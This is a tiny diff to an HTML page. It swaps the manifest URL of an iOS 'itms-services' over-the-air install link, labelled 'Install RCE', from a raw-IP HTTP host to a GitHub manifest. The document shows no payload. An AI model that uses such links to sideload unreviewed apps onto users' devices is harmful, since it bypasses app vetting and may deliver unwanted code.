--- a/index.html
+++ b/index.html
@@ -5,6 +5,6 @@
   </head>
   
   <body>
-        <a href='itms-services://?action=download-manifest&url=http://222.177.4.242/ios/d.plist'>安装RCE</a>
+        <a href='itms-services://?action=download-manifest&url=https://github.com/lei-wen/OTA/blob/master/manifest.plist'>安装RCE</a>
   </body>
 </html>
